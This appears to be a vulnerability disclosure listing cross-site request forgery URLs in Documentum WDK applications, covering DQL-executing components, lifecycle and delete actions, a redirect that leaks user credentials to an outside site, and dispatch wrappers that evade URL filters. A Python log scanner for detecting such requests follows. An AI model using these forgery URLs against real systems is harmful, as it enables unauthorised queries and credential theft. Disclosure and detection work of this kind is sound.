documentum security vulnerabilities: multiple XSRFs in WDK applications

Cross-site request forgery (CSRF, also written XSRF) is described in detail on Wikipedia; in short, any request that the server authenticates only by the browser's session cookie can be triggered by a page the victim visits while logged in. Below is a list of URLs (or components) in WDK applications (Webtop, TaskSpace, EPFM, Documentum Administrator) that are vulnerable to XSRF: each one accepts the operation and all of its parameters in a plain GET request.

DQL execution

  • /webtop/component/dqleditor?query=<query>
  • /webtop/component/appintxdql?query=<query>
  • /webtop/component/search?queryType=dql&query=<query>
  • /da/component/auditlist?query=<query>
  • /webtop/component/historicalactivityreportresults?process_id=0000000000000000&query=<query>
  • /webtop/component/processdetailreportresults?process_id=0000000000000000&query=<query>
  • /webtop/component/historicalprocessreportresults?query=<query>
  • /webtop/component/historicaluserreportresults?query=<query>
  • /webtop/action/view?objectId=<objectId of a dm_query object> (runs the stored query via /webtop/component/search?queryType=dql&query=<query>)
  • /webtop/action/search?queryType=dql&query=<query> (forwards to /webtop/component/search?queryType=dql&query=<query>)

other

  • /webtop/component/virtuallinkconnect?redirectUrl=http://url&virtualLinkPath=/webtop/component/main (sends the user's credentials to a foreign site of the attacker's choosing; found in 6.7 SP2)
  • /da/component/scsaveas?objectId=<objectId> (creates a copy of an object; the copy can potentially be given a less restrictive ACL than the original)
  • /webtop/action/deletenotification?type=dm_notification&routerId=0000000000000000&objectId=<objectId> (deletes a dmi_queue_item object)
  • /webtop/action/demote?objectId=<objectId> (demotes the document to its previous lifecycle state)
  • /webtop/action/promote?objectId=<objectId> (promotes the document to its next lifecycle state)

Components can be launched either directly (as in the examples above) or through a container component, which passes its remaining parameters on to the named component:

  • /webtop/component/dialogcontainer?component=search&queryType=dql&query=<query>&componentArgs=

or through the appintgcontrollerlogin component, which dispatches to either a component or an action depending on dispatchtype:

  • /webtop/component/appintgcontrollerlogin?dispatchitem=search&dispatchtype=component&queryType=dql&query=<query>

Actions can be launched through ActionDispatcherServlet (as in the examples above, /webtop/action/<name>) or through the actiondispatcher component:

  • /webtop/component/actiondispatcher?action=search&queryType=dql&query=<query>

or through any component at all, via the startupAction parameter. Because of these indirect dispatch paths, any filter, WAF rule or log search keyed on the direct URLs alone is trivially bypassed; the real target has to be resolved from the wrapper's parameters.

  • /webtop/component/main?startupAction=search&queryType=dql&query=<query>
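The following is an added example, not code from the original post or from Documentum. It turns the three lists above (DQL sinks, other state-changing components and actions, and the dispatch wrappers) into a small access-log check: each request URL is first unwrapped through dialogcontainer, appintgcontrollerlogin, actiondispatcher or startupAction to the component or action it really reaches, and a hit is reported when that target is one of the listed sinks and the Referer is missing or belongs to another origin. The log lines, the origin http://webtop.example.com and the host names are constructed for the example; the component and action names are the ones listed on this page.

```python
"""Flag requests to the XSRF-prone WDK components/actions listed above,
including ones reached through a dispatch wrapper.  Added example."""
import re
from urllib.parse import parse_qs, urlsplit

# Components that execute a caller-supplied DQL query (from the list above).
DQL_COMPONENTS = {
    "dqleditor", "appintxdql", "search", "auditlist",
    "historicalactivityreportresults", "processdetailreportresults",
    "historicalprocessreportresults", "historicaluserreportresults",
}
# Actions that run a query or change state (from the lists above).
SENSITIVE_ACTIONS = {"view", "search", "deletenotification", "demote", "promote"}
# Other listed components with side effects.
OTHER_COMPONENTS = {"virtuallinkconnect", "scsaveas"}

PATH_RE = re.compile(r"^/(?P<app>[^/]+)/(?P<kind>component|action)/(?P<name>[^/?]+)$")

def resolve_target(url):
    """Return (kind, name, params) for the component or action a WDK URL really
    reaches, unwrapping the dispatch containers described on this page."""
    parts = urlsplit(url)
    m = PATH_RE.match(parts.path)
    if not m:
        return None
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    kind, name = m.group("kind"), m.group("name")
    if kind == "component":
        if name == "dialogcontainer" and "component" in params:
            name = params["component"]
        elif name == "appintgcontrollerlogin" and "dispatchitem" in params:
            kind = params.get("dispatchtype", "component")
            name = params["dispatchitem"]
        elif name == "actiondispatcher" and "action" in params:
            kind, name = "action", params["action"]
        elif "startupAction" in params:  # any component honours startupAction
            kind, name = "action", params["startupAction"]
    return kind, name, params

def classify(url):
    """Return a short reason string if the URL hits a listed sink, else None."""
    target = resolve_target(url)
    if target is None:
        return None
    kind, name, params = target
    if kind == "component" and name in DQL_COMPONENTS and "query" in params:
        return f"dql:{name}"
    if kind == "action" and name in SENSITIVE_ACTIONS:
        return f"action:{name}"
    if kind == "component" and name in OTHER_COMPONENTS:
        return f"component:{name}"
    return None

# Combined log format: ip ident user [ts] "METHOD url proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def same_origin(referer, app_origin):
    """True only when the Referer's scheme://host[:port] equals app_origin."""
    if referer in ("", "-"):
        return False
    r = urlsplit(referer)
    return f"{r.scheme}://{r.netloc}" == app_origin

def scan_log(lines, app_origin):
    """Return (timestamp, ip, reason, url, referer) for every request that hits a
    listed sink from a missing or foreign Referer.  A missing Referer is flagged
    too: browsers and proxies strip it, so treating it as safe would hide attacks."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = classify(m.group("url"))
        if reason is None or same_origin(m.group("referer"), app_origin):
            continue
        hits.append((m.group("ts"), m.group("ip"), reason, m.group("url"), m.group("referer")))
    return hits

# Constructed sample log lines (hosts, addresses and timestamps are made up).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2013:10:00:01 +0000] "GET /webtop/component/dqleditor?query=select+r_object_id+from+dm_user HTTP/1.1" 200 512 "http://webtop.example.com/webtop/component/main" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2013:10:00:02 +0000] "GET /webtop/component/main?startupAction=search&queryType=dql&query=select+r_object_id+from+dm_user HTTP/1.1" 200 512 "http://evil.example.net/page.html" "Mozilla/5.0"',
    '10.0.0.6 - - [01/Jan/2013:10:00:03 +0000] "GET /webtop/component/appintgcontrollerlogin?dispatchitem=promote&dispatchtype=action&objectId=0000000000000000 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [01/Jan/2013:10:00:04 +0000] "GET /webtop/component/inbox HTTP/1.1" 200 512 "http://evil.example.net/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG, "http://webtop.example.com"):
        print(hit)
```

On the sample above the first line is a legitimate in-app DQL editor call and is not reported, the second and third are reported because the startupAction and appintgcontrollerlogin wrappers resolve to the search and promote actions with a foreign or absent Referer, and the fourth is ignored because inbox is not a listed sink. Referer checking is a detection aid, not a fix: the application itself still needs a per-session anti-forgery token on every one of the listed operations.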
